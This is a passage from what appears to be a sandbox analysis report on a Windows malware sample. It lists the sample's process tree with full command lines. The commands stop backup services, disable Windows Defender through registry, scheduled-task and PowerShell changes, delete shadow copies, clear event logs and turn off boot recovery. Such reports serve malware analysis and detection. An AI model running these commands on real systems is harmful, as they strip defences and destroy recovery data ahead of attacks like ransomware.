2876 wrote to memory of 1836 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 107 PID 2876 wrote to memory of 1848 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 109 PID 2876 wrote to memory of 1848 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 109 PID 2876 wrote to memory of 1948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 111 PID 2876 wrote to memory of 1948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 111 PID 2876 wrote to memory of 2240 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 113 PID 2876 wrote to memory of 2240 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 113 PID 2876 wrote to memory of 2896 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 115 PID 2876 wrote to memory of 2896 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 115 PID 2876 wrote to memory of 3096 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 117 PID 2876 wrote to memory of 3096 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 117 PID 2876 wrote to memory of 692 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 119 PID 2876 wrote to memory of 692 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 119 PID 2876 wrote to memory of 2220 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 121 PID 2876 wrote to memory of 2220 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 121 PID 2876 wrote to memory of 2116 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 123 PID 2876 wrote to memory of 2116 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3824
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3588
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1152
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2452
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3680
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2772
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1492
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:716
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1515a" /y2⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1515a" /y3⤵PID:788
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3236
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1388
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1428
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1836
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1848
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1948
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1515a" start= disabled2⤵PID:2240
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3096
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:692
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2220
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2116
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3908
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1452
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2172
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3776
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3976
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3988
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3528
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:60
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1084
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2000
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:644
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2784
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:676
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:400
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2708
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1200
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1332
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1132
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1408
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2252
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1968
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4080
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2840
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3860
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3728
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2128
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2176
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1324
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:836
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:960
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1424
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-